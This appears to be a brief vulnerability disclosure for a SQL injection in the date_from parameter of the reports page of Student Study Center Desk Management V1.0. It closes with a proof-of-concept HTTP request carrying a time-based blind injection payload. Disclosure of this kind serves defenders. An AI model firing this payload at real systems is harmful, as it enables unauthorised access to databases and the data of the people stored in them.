admin#date_from has sql injection vulnerability
Vulnerability Product:Student Study Center Desk Management
Vulnerability version: V1.0
Vulnerability type:sql injection
Vulnerability Details:
admin#date_from has sql injection
Vulnerability location admin\reports\index.php
parameter data_from is spliced into sql without filtering to cause sql injection
Vulnerability recurrence
poc
1 | GET http://192.168.137.1/admin/?page=reports&date_from=2023-02-17'and(select*from(select+sleep(2))a/**/union/**/select+1)='&date_to=2023-03-17 HTTP/1.1 |